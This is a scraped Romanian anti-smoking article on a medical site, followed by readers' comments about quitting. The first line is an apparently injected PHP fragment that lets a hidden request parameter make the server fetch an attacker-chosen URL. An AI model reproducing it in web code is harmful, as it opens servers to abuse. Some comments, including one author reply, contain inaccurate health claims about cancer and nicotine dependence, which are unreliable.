isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Fumatul ucide - MedicAS

fumatul - nu fumatFumatul dăunează grav sănătăţii”, “Fumatul cauzează cancer”, “Fumatul în timpul sarcinii este periculos pentru copii”, sunt doar cîteva din propoziiţiile pe care le găsim inscripţionate pe pachetele de ţigări din care extragem, mai mult sau mai puţin graţios, ţigara cea din toate zilele.Fie că o asortăm la cafea, fie că suntem nervoşi, stresaţi şi atunci trebuie neapărat să ne aprindem o ţigară, zilnic golim zeci, sute, mii de pachete, depinde la ce populaţie ne raportăm.


De mîine încerc să mă las”, “Cînd o să fiu însărcinată renuţ de tot la ţigări”, “Am încercat, dar n-am reuşit”, “Ţigara mă ajută să mă concentrez”, “Bunicul a fumat o viaţă şi a trăit 85-90 de ani”, “Mulţi medici fumează”, sunt afirmaţii pe care le-am auzit la cunoştinţele mele şi unele chiar îmi aparţin.Nu ştiu ce ne face să aprindem ţigările: anturajul, gestul în sine, problemele la care credem că găsim rezolvarea cînd fumăm, dar ştiu sigur că dacă ne dorim cu adevărat să renunţăm, se poate.Şi am un exemplu în familie, tatăl meu, care a renunţat de la 3 pachete pe zi.
Nu-mi propun să vă dau sfaturi, pe care cu siguranţă le primiţi de la părinţi, soţi, soţii, profesori şi alte persoane care se gîndesc la plămînii dumneavoastră şi , de ce nu, şi la ai lor.Vreau doar să vă prezint cîteva efecte, consecinţe şi date statistice privind fumatul.

În rest, ALEGEREA ESTE A DUMNEAVOASTRĂ !!!

De ce să NU fumăm?

Peste 4000 de substanţe au fost identificate în fumul de ţigară, incluzînd cîteva care sunt active farmacologic, antigenice, citotoxice, mutagene şi carcinogene.
Printre substanţele periculoase conţinute de ţigări se numără:

 • nicotina: este un alcaloid foarte toxic, stimulent şi sedativ neuroendocrin şi dă dependenţă
 • gudronul: este un termen general pentru mai multe particule ce rezultă din fumul de ţigară. Particulele conţin substanţe chimice printre care oxizi de nitrogen, dioxid de carbon, monoxid de carbon, dar şi benzpiren, o hidrocarbură puternic cancerigenă.
 • monoxidul de carbon: interferă cu transportul şi consumul de oxigen
 • oxizi de nitrogen, cianură de hidrogen, amoniac
 • metale (arsenic, cadmiu şi plumb) şi compuşi radioactivi, cu efecte carcinogene

La ce ne expunem dacă fumăm?

 • fumatul este o cauză importantă a bolilor pulmonare cronice obstructive, tusea cronică, expectoraţia şi insuficienţa respiratorie fiind frecvent întîlnite la fumători; consumul ţigărilor a fost asociat, de asemenea, cu o incidenţă crescută a infecţiilor respiratorii şi deceselor cauzate de pneumonie şi gripa
 • este o cauză majoră a bolii coronariene, contribuind atît la apariţia aterosclerozei coronariene, cît şi la evenimentele acute coronariene ischemice (infarct miocardic), trombotice şi aritmice; agravează ischemia periferică, poate afecta grefele de by-pass periferic şi este o cauză importantă a bolilor cerebrovasculare
 • fumatul este responsabil în proporţie de 85-90% de apariţia cancerului bronho-pulmonar; important factor de risc şi pentru alte tipuri de cancere: cavitate bucală, faringe, laringe, esofag, pancreas, vezică urinară, rinichi, stomac, col uterin.
 • este un factor de risc pentru instalarea mai devreme a menopauzei la femei, apariţia prematură a ridurilor faciale, a osteoporozei la femei, a disfuncţiilor sexuale la bărbaţi, scăderea imunităţii în general
 • fumatul în timpul sarcinii poate afecta dezvoltarea fătului, acesta cîntărind mai puţin decît un nou-născut al unei mame nefumătoare; creşte riscul de avort spontan şi de deces al fătului
 • alte efecte: gingivite, apariţia cariilor, voce răguşită, îngălbenirea tegumentelor degetelor, a unghiilor

Fumatul pasiv – ştiţi ce consecinţe are?

Fumatul pasiv reprezintă inhalarea fumului de ţigară de către nefumători, într-un mediu în care se fumează şi este la fel de dăunător pentru sănătate ca şi fumatul propriu-zis.Efectele fumatului pasiv pot fi senzaţia de greaţă, cefaleea, tusea, iritaţia ochilor, exacerbări la pacienţii astmatici, creşterea riscului de cancer pulmonar, a riscului de boli cardiace şi accidente vasculare cerebrale.

Fumatul pe glob:

Există aproximativ 1.2 miliarde fumători în lume.
Fumatul este responsabil pentru aproximativ 4 millioane decese în fiecare an, 11.000 in fiecare zi.
Fumarea unei singure ţigări scurtează viaţa cu 7 minute.
Rata mortalităţii în rîndul fumătorilor este de 2-3 ori mai mare decît la nefumători la toate grupele de vîrstă.
Aproximativ jumătate din decesele legate de fumat se produc între 35-69 ani, ceea ce face din fumat cea mai importantă cauză de moarte prematură în ţările civilizate.
Fumătorii trecuţi de 30 de ani suferă de 5 ori mai multe infarcte miocardice decît nefumătorii.
Fumatul cauzează cca. 30% din decesele prin cancer; aproximativ 90-95% din decesele prin cancer pulmonar la bărbaţi şi 70-75% la femei se datorează fumatului.

Dr. Anca Sava


Cuvinte relevante: , ,


Articole asemănătoare:

139 Răspunsuri la “Fumatul - un viciu care ucide!”


 1. Dana :

  Super interesant articolul.Eu ajunsesem sa fumez un pachet si jumatate de tigari pe zi cand aveam probleme si multe sarcini de rezolvat.Apoi am incercat plasturii cu nicorette, tigarile medicinale (nu va scriu ce gust aveau…) si intr-o zi am spus stop.Cafeaua merge si fara tigari.Si ma gindesc deja sa trec pe ceai verde.E simplu: daca vrei cu adevarat, poti.


 2. Mario :

  Bravo dana..Eu am fumat 5 ani de la 14 ani si mi-sa pus pata sa ma las …( mi-a venit mintea la cap) si m-am lasat ..Gume nicorette , vointa..Si fumam mult…


 3. andra :

  buna, si eu am zis stop, am incercat de multe ori sa imi planuiesc o zi, sa stau sa ma gandesc de ce sa renunt, dar n’a mers. dupa care am zis stop mi’am facut damblaua nu mai vreau sa fumez. cert este ca incepusem sa respir foarte greu si m’am speriat si plus ca planuiesc si un bebe in vreo 2 ani. asa ca era cazu sa fac si asta


 4. Dr. Anca Sava :

  Felicitari Andra.


 5. maria :

  in 17.07.2008 seara mai aveam 5 tigari in pachet,am zis le fumez pe astea si de maine nu mai fumez.Pana acum vad ca rezist, beau dimineata cafea cum faceam si inainte stau intre colegi fumatori si merge,eu cred ca daca ai vointa se poate(am fumat 24 de ani-1 pachet pe zi)am avut o motivatie pentru asta,nu o mai am ca tot ce e frumos tine 3 zile dar sper sa nu ma apuc de fumat


 6. Dr. Anca Sava :

  Maria, daca tu nu vrei, nu o sa te apuci. Totul depinde de tine. Si scriu din experienta, pentru ca de la 1 iunie nici eu nu mai fumez. Poate facem un club al fostilor fumatori pe MEDICAS :-)


 7. Daniela :

  Buna tuturor..si eu intentionez sa ma las….cat va fi de greu..nu conteaza…oricum daca pui in balanta ..nu ai niciun beneficiu


 8. Dr. Anca Sava :

  Daniela iti doresc succes. Si da-ne un mail cand te-ai lasat. :-) Facem clubul ala…


 9. Carmen :

  Buna tuturor, felicitari celor care au avut vointa de a se lasa de fumat, in special Dnei Dr Anca, eu fumez de la 18ani acum am 32 si as vrea sa ma las dar vointa de care am nevoie e undeva departe. Sper sa vina ziua ca o sa spun: am fumat si eu candva!


 10. Dr. Anca Sava :

  Carmen vointa e doar in tine. Cand o sa vrei TU sa spui stop, asa o sa fie. :-)


 11. sorin :

  sunt fumator de vreo 7-8 ani, fumez cca 1-2 pachete pe zi, de vreo 5 ani vreau sa ma las de acest viciu, astazi m-am hotarat sa renunt definitiv, si am luat la rand toate forum-urile si am ajuns la concluzia ca doar eu pot face acest lucru, multumesc pt. informatiile oferite.


 12. Dr. Anca Sava :

  Sorin multa bafta.


 13. sasha :

  pina la virsta de 23 ani nu stiam gustul tigarii.Pina cind miam gasit a doua jumatate care a fumat timp de 5 ani de zile.Am insistat mult si a lasat fumatul.Dar problema e ca am jumatate de an de cind mam apucat de fumat si nu pot sal las nici ca cum,las de pe o zi pe alta.Mine sigur no sa mai fumez.Nu stiu ce sa fac.


 14. raluca :

  eu am avut vointa si nici nu am incercat sa fumez


 15. raluca :

  lucrez insa intr-un bar de fumatori…
  asa ca poate imi fac mai rau cu fumatul pasiv…


 16. niKa_ :

  salut tuturor si sunt bukuroasa pentru cei kare au lasat fumatul si le urez multa bafta celor care are de gind sa o faka in timpul kit mai kurind!insa am o problema si va rog sa ma ajutati!ma intilnesk ku un baiat si e fumator de 3 ani……de multe ori am incerkat sa fak multe ka sa nu fumeze….mergea un timp dar apoi iar se apuka!spunea ka nu poate sa lese!dar eu doar stiu ka totul e posibil!ajutatima va rog si datimi nishte sfaturi ce as putea face ka sal las de fumat!va implor!


 17. ole :

  am fumat de la 17 la 32 de ani. Nu mai fumez de 10 zile si este a 5 oara cand incerc. Cel mai mult am reusit sa nu fumez 3 luni. Sper ca de data asta sa reusesc sa ma las definitiv.


 18. florin :

  Si eu am fumat 8 ani dintre care, in ultimii 4, cel putin 2 pachete pe zi (uneori chiar 3)!! Ajunsesem sa respir foarte greu, sa fac des bronsita intr-o forma violenta. La inceputul lunii martie m-am oprit, pe fondul unei asemenea bronsite, dupa care am plecat 2 sapt. in concediu undeva la munte si m-am abtinut cat am putut sa nu mai fumez, insa faceam multa miscare in aer liber. Dupa concediu am inceput o cura de ceai verde cu muguri de pin, pe care inca o mai tin si acum si nu am mai pus tigara in gura deloc. In scurt timp a disparut senzatia aceea de nevoie de a mai aprinde vreo tigara, apoi am devenit indiferent la cei din jur care fumau, dupa care s-a instalat, definitiv cred, sentimentul de repulsie totala fata de tigari. In tot acest timp am continuat sa fac miscare si sa beau ceaiul de care v-am spus iar acum ma simt foarte bine si sunt intr-o forma fizica foarte buna.
  Ser ca exemplul meu personal sa-i ajute si pe cei care doresc sa se lase de fumat si carora le doresc din inima succes


 19. doru :

  am 2 zile.am nicoret plasturi.sper sa tina.vreau sa ma las de fumat!


 20. Tudor :

  Buna ziua,
  Am fumat 11 ani, din care in ultimii doi ani fumam in jur de doua pachete pe zi, chiar trei.
  Prima tentativa de lasat de fumat am avut-o in facultate inainte de licenta…lucru esuat.
  Dupa ce m-am casatorit/maturizat :D, intr-o zi m-am gandit: 1. ce exemplu am sa dau copiilor mei?; 2. ce fac cu sanatatea mea?; 3. cheltui aproximativ 250 lei/luna/tigari.
  Totul sta in vointa omului, m-am lasat de fumat cu pachetul de tigari in buzunar, nu am aruncat pachetul pentru a-mi testa vointa…si acum am aproape un an decand m-am lasat de fumat si nici nu o sa ma mai apuc.
  Deci ganditi-va clar ce vreti sa faceti cu imaginea, banii si sanatatea voastra.


 21. iosif cristina :

  Cristina,
  Buna,

  am 40 ani, 2 copii frumosi si un viciu foarte urat. Fumez de 25 de ani, aprox. 1 pachet pe zi si nu pot sa ma las. Reclamele sunt peste tot, dar eu cred ca decat sa se faca atatea reclame mai bine s-ar actiona prompt. De exemplu daca vrei sa intri intr-un program anti fumat, trebuie sa te inscri, sa astepti, sa faci 7 drumuri, eventual sa ai si o pila. Cel mai bine, sa se dea voie medicilor de familie sa aplice metode si tratamente antifumat sau sa se infiinteze cabinete speciale si in orasele mici. Ar fi mult mai usor decat sa te intrebi de unde sa incepi.


 22. Dr. Anca Sava :

  Cristina e o chestiune de vointa. Sa vrei tu cu adevarat si se poate. Nu-ti da dependenta fizica si psihica ca si consumul de droguri, deci alege-ti o zi in care sa spui stop, scrie-ne un mesaj si suntem alaturi de tine. :-)


 23. Cosmin :

  Salut,

  am 16 ani shi fumez de la 13 ani , am incercat toate metodele posibile sa ma las de fumat dar fara nici un rezultat, imi amintesc k am renuntzat la fumat pt o perioada de 2 luni la fumat dar iar m am apucat, kestia e k dak ai vointza potzi reushii orice , sper sa vine o zi knd o sami vina mintea la cap shi o sa ma las pana atnci cele bune shi felicitari celor care au reusit sa scape de viciul asta .


 24. Alex :

  Nu vreau sa ma laud…. :)) Dar de 2 zile nu mai pun tigare in gura…si sper sa ma tina…cat oi mai trai. NU MAI IMI TREBUIE TIGARI, cred ca ar fi cea mai buna motivatie :) plus ca se observa la buzunar…si la burtica :)), nu mai zic la plamani si la alte cele :)). Eu mi`am propus sa ma las de fumat doar din simplu fapt ca as vrea sa ma mai ingras putin :). Probabil o sa ziceti…eh fumeaza si asta de 2 luni si acu se lasa. NU … va contrazic…fumez de 12 ani de zile…poate mai mult de 1 pachet pe zi…si nu exagerez. Pentru mine…2 zile fara tigare… e un record :), poate suna penibil dar in 12 ani de zile…nici macar nu am incercat sa le reduc. :)) Aveti incredere in voi…totul este posibile ! Bafta !


 25. Raluk :

  eu sunt un copil nu fumezdar stiu ca Fumatul dauneaza GRAV santatii!Cei care fumeaza as vrea sa le dau un sfat:Nu fumati pentru ca fumatul va distruge viata!


 26. Ana Maria :

  Eu sincer cred ca nu am vointa. Am incercat de f multe ori sa ma las m-a tinut 2-3 zile si gata….singura perioada cand nu am fumat a fost perioada sarcinii si dupa ce am nascut inca jumatate de an….in principiu imi doresc f mult sa ma las de fumat….sper sa reusesc….

  va pup


 27. MUNTEANU FLORIN :

  am fost fumator 11 ani ( 1-2 pac/zi). am renuntat la tigari acum 6 luni!! de “vina” este venirea pe lume a baietelului meu!! daca vrei cu adevarat , se poate!!


 28. Robert :

  Si eu fumez de circa 3 luni,dar nu in fiecare zi,cam o tigara la 3 zile :-D …Colegii mei de la scola fumeaza si ei..M’am apucat dintr’o prostie,chiar nu simti nimic daca fumezi:))…daca vreau sa ma las pot dar totusi anturajul nu ma lasa:-( ….Eu sincer vreo 1 sapt 2 cat am sat in vacanta fara colegi singur am renuntat:| dar revenind la scoala..m’am apucat iar..am 16 ani


 29. Alin :

  Am 17 ani si fumez de aproape 3 ani.Am incercat deseori sa renunt la acest viciu dar a fost in zadar. Nu stiu ce sa fac.. insa stiu sigur ca odata si odata o sa ma las. Ramane de vazut cand.


 30. Ioana :

  Am fost fumatoare 5 ani de zile….dar dintr o data mi s a pus pata ca nu mai vreau sa fumez si m am lasat de ele.Iar gumele ce contin nicotina sunt cele mai proaste alegeri de a inlocui tigarile…pt ca noi de fapt trebuie sa eliminam toata nicotina din corp in schimb acele gume contin nicotina.Toata smecheria ii sa avem foarte multa vointa….si rabdare


 31. Ioana :

  ORICINE POATE…..ESTE RIDICOL SA TE LASI DE FUMAT.:p Fii inteligent. N-ai nevoie de ţigară: nu-ţi oferă absolut NIMIC.Scoate-ţi, doar o clipă, capul din nisip şi întreabă-te: dacă ai şti absolut sigur că următoarea ţigară va declanşa în organismul tău un cancer, ai mai fuma-o? E dificil să-ţi imaginezi boala, dar gândeşte-te că va trebui să mergi în spital pentru tratamentele acelea cumplite – iradieri, citostatice etc. În clipa aceea nu-ţi mai faci planuri de viaţă, ci de moarte. Ce se va alege de familia ta şi de cei dragi, de proiectele şi visurile tale?


 32. geanina :

  eu sunt un copil am 12 ani si vreau sa va zic sa nu mai fumati mai ales cei care aveti copii nu numai fumati ca-i avectati si pe ei dar va afectati si pe voi va dau un sfat mare stiu ca e dificil pt voi fumatorii dar va spun nu mai fumati


 33. flory :

  fumez cam in jur de un pachet pe zi, dar am zile in care nu-mi ajung 2 pachete pe zi. si credeti-ma, nu mai pot! vreau sa ma las dar ceva in mine mai ia o tigara. sunt constienta de toate riscurile, dar nimic. nu mai pot!


 34. roxana :

  doresc sa vaintreb daca tigarile pot sa dea durere de cap si lipsa de concentrare


 35. Dr. Anca Sava :

  Buna Roxana. Din pacate raspunsul este DA: tigarile pot avea aceste efecte. Vorbesc si scriu :-) din proprie experienta; in zilele cand fumam mai mult ca de obicei sau stateam in locuri in care se fuma mult si nu aveau sistem bun de aerisire, ma durea capul.
  Ce zici? Iti propui pentru 2009 sa renunti la fumat?


 36. Anda :

  Din pura intamplare am aflat de acest site, si spre surprinderea mea chiar al Dv.(sunt studenta anul I la kineto), am inceput sa citesc si m-am oprit aici.
  Spre rusinea mea fumez de mai bine de 3 ani si am trecut prin multe provocari si lupte cu mine sa spun NU. Nu am reusit inca, aud in jur tot felul de afirmatii cum ati relatat si in articol “maine ma las”, ” ultimul pachet”, etc. dar mai aud si afirmatii : ” tigara e o placere, chiar daca ucide”, ” eu am momentele mele pentru a savura o tigara chiar daca sunt constient/a cat rau imi provoaca”. Sunt o copie a ultimelor afirmatii, am citit carti, articole despre cat rau aduc tigarile si cu cat imi ingreuneaza viata de zi cu zi. Incepand de la timpul irosit, acele 5 minute in care as putea sa fac ceva pozitiv pentru mine , le irosesc fumand, pierd 5 minute si alte 7 care mi le fura o singura tigara, pana la cancer. As vrea, si caut din ce in ce mai mult motivatia necesara sa ajung ca intr-o simpla dimineata cand ma trezesc sa beau cafeaua fara sa tanjesc cu privirea dupa o tigara. Tigara e facuta de om, doar noi putem sa-i facem existenta inexistenta. Frumos articol, multumesc, o motivatie in plus cu ajutorul lui.


 37. Anda :

  Din intamplare am gasit site`ul si am fost placut surprinsa de faptul ca e al dv. (sunt studenta anul I la kineto). Am citit mai multe articole si m-am oprit aici. Fumez de mai bine de 3 ani, spre rusinea mea, am fost sportiva si cu atat mai mult tigara ar fi trebuit sa stea departe de mine si de organismul meu. Ca orice copil m-am jucat si uite ca s-au facut mai bine de 3 ani si acum se joaca ea cu mine. Imi caut motivatie in fiecare zi, ba dintr-o carte, ba din mii si mii de articole, si stiu, motivatia trebuie sa o gasesc doar in mine. Am ajuns sa zic ca vreau sa nu mai fumez si e un pas important ramane sa-mi asez tot piciorul in prag. Minunata imi va fi dimineata cu ceasca de cafea fara tanjirea ochilor dupa tigara. Frumos articol, multumesc, e un plus la motivatia mea.


 38. MIHAELA :

  frumos site si foarte interesant hai poate reusesc si eu sa ma las,dar cred ca nu am vointa………….?sau poate da?


 39. Emilian :

  Oare nu s-ar putea interzice de tot tutunul??? sa fie un fel de prohibitie, fix cum a fost cu alcoolul in america. atunci ar fi spre binele tuturor.:D


 40. Ovidiu :

  Intradevar tigara este un viciu care nu ajuta absolut la nimic.
  Este cea mai mare prostie care ar fi putut fi inventata de om vrodata.
  Deocamdata sunt fumator , pentru ca nu ma pot numi altfel, deoarece am doar 2 zile de cand nu mai fumez, dar voi face tot ce-mi sta in putinta sa ma las de aceasta otrava.
  Va urez succes in continuare.pa pa


 41. ovidiu :

  salut,am 16 ani si fumez de 6-7 luni,la mine nu e problema cu renuntatul la tigarii,pot sa le las oricand.am inceput prin a fuma cu colegii,si,ii intrebam mereu cum se mani feste nevoia de tigara?si,am primit raspunsurii diverse…dar nici unul satisfacator,si,am decis ca,singura persoana care imi poate da raspunsul sunt eu!
  Urmaresc de 6 luni sa vad cum se manifeste aceea nevoie,uneorii ajung cu fumatul si la un pachet pe zi(fumez si daca nu e necesar,cand sunt cu prietenii)si,sunt
  zile in care nu fumez deloc,si totusi nu simt nevoia de a fuma deloc ,subliniez DELOC!
  sa fie ceva in neregula cu corpul meu…oare?
  Astept raspunsurii,multumesc!


 42. Alec :

  ovidiu, la 16 m-am apucat si eu ..acum am 22…de 2 zile mai mult ca niciodata simt ca mi-a ajuns…eram la metrou am urcat 2 randuri de trepte dupa care am inceput sa gafai vreo 5 minute.am zis ultimul pachet.acum 2 zile am aprins o tigara,ultima din pachet am fumat-o pana la jumatate dupa care am aruncat-o in sictir si uitandu-ma cu ura la ea…sunt decis sa le las! sfatul meu daca ai zile in care nu simti absolut deloc nevoia sa fumezi, lasa-le de tot..ai vazut cum e, ti-ai satisfacut curiozitatea,da-le un exemplu prietenilor tai


 43. carmen :

  Buna.Am gasit acest site din intamplare si am citit parerea fiecaruia despre fumat.Intr-adevar fumatul e un viciu.Am 23 de ani si fumez de 9 ani cam un pachet la 2-3 zile,au fost zile cand fumam un pachet pe zi,dar acele zile sunt rare.Acum 2 ani mi s-a interzis fumatul,m-am lasat cam o luna,dar le-am luat din nou si de-atunci nu am mai incercat sa le las.Mi-e teama sa le las pt ca am tendinta de a ma ingrasa…acum nu stiu din ce cauza ma ingras,daca las tigarile.poate imi spuneti dvs:D.Imi doresc foarte mult sa ma las,dar nu am ambitie.Din cauza tigarilor,am dureri de cap,de inima,obosesc foarte repede si de multe ori imi amorteste orazul pe partea stanga,in timp ce fumez.Am incercat si eu sa ma las de fumat cu ceva picaturi,cumparate din farmacie,dar…nici un rezultat.Astept raspunsuri si… va multumesc anticipat.


 44. DRAGOS :

  am 5 saptamani de cand nu mai fumez. am inceput cu plasture nicoret. e bun, dar cel mai mult conteaza VOINTA.am fumat 12 ani 1-2 pachete .nu mai suport fumul de tigara si nici mirosulsi imi trece aproape de tot


 45. DRAGOS :

  ah, un ajutor natural este ceaiul de pedicuta.


 46. DRAGOS :

  cand vrei sa te lasi , e bine sa stai linistit acasa 2-3 zile.fructele sunt cel mai bun inlocuitor


 47. Tiplea Gheorghe :

  Dupa 35 de ani de fumat in data de 6 Octombrie 2008 m-am lasat de fumat.Am facut-o fara sa regret si de atunci nu am mai pus tigara in gura.E greu de explicat prin ce stari am trecut si nu doresc nimanui sa aiba acele stari de depresie,insomnie.Sunt azi un om aproape fericit cel putin ca de un viciu am scapat.La rind e cafeaua.Cu ce as putea sa o inlocuiesc?Acum am 56 de ani.Niciodata nu e prea tirziu daca ai cu aevarat ambitie si dorinta de a renunta.Nu imi place acum nici sa stau in apropierea fumatorilor ,ma deranjeaja mirosul si nu il mai suport.


 48. Tiplea Gheorghe :

  In comentariul de ieri am uitat sa precizez ca am avut intentia de a ma lasa de fumat de mult timp si mi-am dat seama ca in afara de vointa si ambitie nu ajuta nimic altceva.Cine procedeaza asa e sigur de reusita dar isi asuma niste riscuri de sevraj mari de tot.Reclama veche de la tv Daca vrei cu adevarat poti se aplica in acest caz.


 49. George :

  salut, eu fumez de la varsta de 14 ani ,adik de 4 ani … si de 2 ani zic k ma las dar nu pot [sau nu vreau ..nush :D] ..


 50. Bogdana :

  Buna,
  Fumez de 3 ani si am zile in care doresc sa ma las si zile in care ma simt excelent cu tigara in mana.Imi place sa fumez, ma simt bine dar as dori sa ma las deoarece vreau sa imi pregatesc o cariera medicala.Nu as dori nicun fel de ajutor decat vointa.
  P.S. de o zi nu am pus tigara in gura, dar inca nu stiu ec vreau.


 51. MIRELLA :

  Solutia mea,
  Am fumat peste 24 de ani.Deci vorbesc in cunostinta de cauza.
  Acum sunt nefumatoare.Sunt fericita!
  Stiti ce m-a ajutat? O sa radeti… o simpla carte…
  IN SFARSIT NEFUMATOR de ALLEN CARR
  Nu am crezut in miracole,dar s-a intamplat.Si totul f. usor.Fara suferinta si depresie.
  Succes


 52. gregoris :

  Am 30 de ani si fumez de 15 ani. M-am lasat de 3 ori in ultimi 2 ani. Prima oara nu am fumat 4 luni, a doua oara nu am fumat 2 luni iar a treia oara nu am fumat 2 saptamani, de fiecare data m-am reapucat din prostie. Acum ma las pentru a patra oara si chiar nu vreau sa mai fumez. Vreau sa va fac sa intelegeti ca nu este asa de greu sa va lasati de fumat daca doriti cu adevarat. Nu este greu. Problema ce-a mai importanta este ca in momentul in care te-ai lasat de fumat nici sa nu mai aprinzi absolut nicio tigra. O saptamana dureaza pana chiar nu mai simti deloc nevoia de a fuma. Devi putin agitat, nervos dar nu exagerat dupa care gata. O sa vedeti o foarte mare schimbare: te trezesti dimineata mai odihnit, mult mai multa energie in tine, vezi viata altfel, nu mai depinzi de nimic. Astept sa aud numai astfel de informatii. Tutunul dauneza grav sanatatii si vietii de zi cu zi. Multa bafta si ambitie.


 53. ionutz :

  salut,am 26 de ani si fumez de 8 ani cam 1 paket pe zi.am avut multe incercari dar toate pana akum s-au soldat cu esecuri.cel mai mult am stat 3 saptamani fara sa fumez…la inceput spuneam in gluma,”pot sa ma las oricand”dar acum mi-am skimbat radical parerea…e foarte greu.acum incerc din nou sa ma las…sper definitiv…asta e a 2a zi de cand nu am mai fumat…azi a fost bine,nu prea am avut pofta dar ieri in prima zi…simteam k inebunesc,foarte greu am trecut de acea zi…sper sa reusesc sa ma las


 54. razvan :

  Salutare tuturor!

  De curand am implinit 14 ani, si sunt foarte tentat sa ma apuc de fumat. Nu am astfel de prieteni, nici parinti, nici nu vreau sa par cool. Pur si simplu imi place fumul de tigara, gestul de a duce tigara la gura .. Dupa parerea mea nu e greu sa te lasi. Spui STOP, si nu-ti mai cumperi. Eventual pui banii care i-ai da pe tigari, intr-un sertar. O idee :D … as vrea sa ma apuc de fumat! sunt constient de riscurile la care ma supun.. :)


 55. Emilian :

  Sfatul meu este sa nu te apuci…ink nu realizezi la adevaratele probleme la care te expui…nu este asa simplu precum pare sa renunti….mai ales o data ce devii dependent…chiar si de acel gest. Deci lasa curiozitatea si nu te apuca…ti-o zice unul nu cu mult mai mare ca tine:P


 56. horea :

  Salut !

  Am 17 ani si fumez de la 13 ani cam 1-2 pachete pe zi….la inceput totul era Ok ..eram cool si eu ca toti ..nu ?:D ..dar acuma nu mai stiu cum sa ma las :( ….tot ziceam…azi ma las ..azi ma las , si tot asa dar in zadar …nu resuseam nici cum sa scap de ele…dar se pare ca intr-un final am zis STOP ! …si de data asta pe bune….nu am mai bagat o tigara in gura de 2 sapt. Lucru care pt mine e un record :)) …sper sa o mentin tot asa..in rest ce sa zic…Multa bafta si ambitie tuturor …


 57. cantemir :

  m-am lasat de fumat acum 8 luni , numai dupa ce am luat nicorette (guma) ; am fumat 38 ani…. in plus , acu` o saptamana m-am apucat de sport (alergari , exercitii fizice , urcat treptele de la bloc din 2 in 2 trepte , vad ca rezultatele sunt bune , nu obosesc excesiv ; dar insa nu ma simt prea bine: am greutati in respiratie , am ameteli , sunt parca fara vlaga , iar acu` 4 luni am facut o pareza faciala… o fi din cauza renuntarii la fumat?
  As vrea o parere daca cineva poate sa-mi dea…..


 58. Dr. Anca Sava :

  Cantemir, cu siguranta pareza nu este din cauza renuntarii la fumat.

  Felicitari ca ai putut renunta la tigari…

  Gindeste-te ca poate fi si astenia de primavara acum cauza simptomelor tale si chiar tu spui ca rezultatele sunt bune dupa ce ai nu ai mai fumat.

  Gindeste pozitiv si totul va fi ok.


 59. razvan :

  Ba stiu riscurile carora ma expun.

  Pot zice STOP oricand. Nu mai iau tigari si asta e. Nu cred ca picioarele mele ma vor tari pana la magazin sa imi cumpar tigari. Nu vreau ¨sa ma apuc de fumat¨. Vreau sa incerc, sa vad cum e. Sa zicem ca voi fuma maxim 2-3 tigari pe zi.


 60. Viorel :

  Eu am 36 de ani si fumez 1 pachet si jumatate pe zi, de la varsta de 19 ani. Pot sa va spun ca ma simt foarte bine si analizele sunt foarte bune. Asa ca nici nu ma gandesc sa ma las de UNICUL viciu pe care il am.


 61. mihaela :

  ziua buna tuturor sant o fata de 16 ani … de un an fumez da am reusyt intrun final sa ma las…credetima nu mia fost usor..avand in vedere ka la liceu fumam kent 4 sau 8 si akasa vicerooy rosu :(:( tot ce conteaza este vointaaaaaaaa de fiekare data knd vroieam sa fumez ma duceam la magazin si imi cumparam un ciupa ciups :))) ….akum de 2 3 zile nu mai fumez nu styu ce este cu mn da credetyma ka imi este sila de iele….akum sa rekunosc:))) am incerkat sa mai fumez ieri una …era o tigare usoara…knd am ajuns la jumate ma loat ameteala :O:O:O:O vb fff serios ….si de atunci numai fumez delok :X si nici nu mai vreau …in lok de un paket de tigary mai bine o saorma (ka tot vreau sa ma ingras:)) ) … ganditiva bn in cea ce priveste fumatul:*:*::* a si am si eu o intrebare sper sa mi se raspunda :( daca mam lasat de fumat plamanii mei se vor insanatosi sau vor ramane la fel ka pana akum knd fumam???


 62. husky :

  daca voi credeti ca lumea moare de la fumat e treaba voastra ,dar sa ne uitam la la cate chimicale sunt in alimentele de piata ca, aproape nimic nu mai este natural incat si cei de la tara pun tot felul de chimicale sa le creasca plantele in gradina , sunt oameni care nu au fumat in viata lor o tigare si nici parintii lor si mor de cancer oare de ce?
  asteas sunt minciuni ca faci cancer de la fumat , dar fumult de la termocentrale ,gazele de esapament astea nu te omoara?? Nu mai stiu pe ce sa dea vina guvernele tarilor sa isi scape ei pielea.
  Nu o sa ma las niciodata de fumat …


 63. Claudiu :

  Am deja 72 ore de cand am renuntat. In afara de ceva ameteli nimic deosebit. Imi lipsesc pauzele de tigara. Incerc sa iau pauze fara tigara, doar cu respiratii adanci. Merge. Poate ca cel mai convingator motiv: Boc nu va iesi din criza pe banii mei(accize) si nici ukrainienii nu vor face bani pe seama mea(contrabanda). Inca ceva : nu merge cu o tigara doua pe zi (prelungiti perioada de dezobisnuire a organismului).


 64. cantemir :

  Viorele , la 36 ani asa ziceam si eu…. dar vine o varsta (eu am 52 ani) cand , poate , o sa regreti faptul ca ai fumat si nu te-ai lasat din timp ; abia acu` m-am apucat de sport , de alergari , si crede-ma , nu mi-e usor dupa 38 ani de fumat si o viata sedentara……


 65. Paya :

  Bunã! Eu am aproape 17 ani shi fumez de la 12 :| Am ìncercat sã mã las da` din cauza stresului nu my pot. Nush dacã am vointsã :-s Ce sã mã fac ¿ Ash vrea ca atunci cánd vreau sã aprind o tsigarã sã*mi dea cineva una dupã cap….da` asta shtiu cã nu se poate :( Am ìncercat de multe ori sã mã las…da` nu am reushit :-s De la Lucky Strike am ajuns la Vogue [d*alea subtsiri] sunt slabe da` tot asha mã dor plãmánii shi respir greu. Shtiu cã poate acum zicetsi : ¨Eshti micã uh te potsi lãsa…¨ da` nu e chiar asha :| Mi*am obishnuit organismu` cu tsigãri :( Mã putetsi ajuta vã rog ¿ Orice sfat mi*ar prinde bine. Multsumesc :*


 66. Andreias :

  numai prosti, mama trebuia sa fie moarta de mult :)), fumeaza 2 pachete de more rosu pe zi si n’are nimic.


 67. lilly :

  Am28 ani si fumez de la 18,de fapt nu mai fumez de ceva timp, nici nu ma intereseaza prea mult cat , a săpramana , 2sapt. … sincer nici mie nu-mi vine sa cred ca nu mai fumez !Imi placea să fumez , imi păceau discuțiile de la țigare,daca nu fumam nu aveam dreptul la 5 min pauza… si ma rog tot așa …Nu ma puteam lasa convinsa de nimic si de nimeni !M-am indragostit de un tip care nu fuma ,și am descoperit dorința de ai face pe plac … nu m-a cerut niciodata asta …dar dragostea e oarba !
  M-am pregatit psihic inainte cu cateva zile inainte si imi repetam ”intr`una din zile asta voi inceta pt tine!”
  …aș vrea să cred că am reusit!


 68. stefania :

